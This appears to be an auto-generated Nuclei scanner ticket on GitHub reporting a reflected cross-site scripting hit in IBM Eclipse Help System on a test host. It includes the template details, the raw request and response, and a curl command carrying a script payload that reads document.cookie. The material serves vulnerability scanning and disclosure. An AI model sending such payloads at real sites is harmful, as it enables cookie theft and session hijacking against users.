search

mkrs2404 / tickets

0 stars 0 forks source link

IBM Eclipse Help System - Cross-Site Scripting (eclipse-help-system-xss) found on honey.scanme.sh #55

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: eclipse-help-system-xss matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Timestamp: Tue Apr 30 19:28:56 +0530 IST 2024

Template Information

Key Value
Name IBM Eclipse Help System - Cross-Site Scripting
Authors pikpikcu
Tags ibm, xss
Severity high
Description IBM Eclipse Help System 6.1.0 through 6.1.0.6, 6.1.5 through 6.1.5.3, 7.0 through 7.0.0.2, and 8.0 prior to 8.0.0.1 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
CVSS-Metrics CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWE-ID CWE-79
CVSS-Score 7.20

Request

GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 309
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:56 GMT

GET /help/index.jsp?view=<script>alert(document.cookie)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15' 'https://honey.scanme.sh/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E'

Generated by Nuclei v3.2.5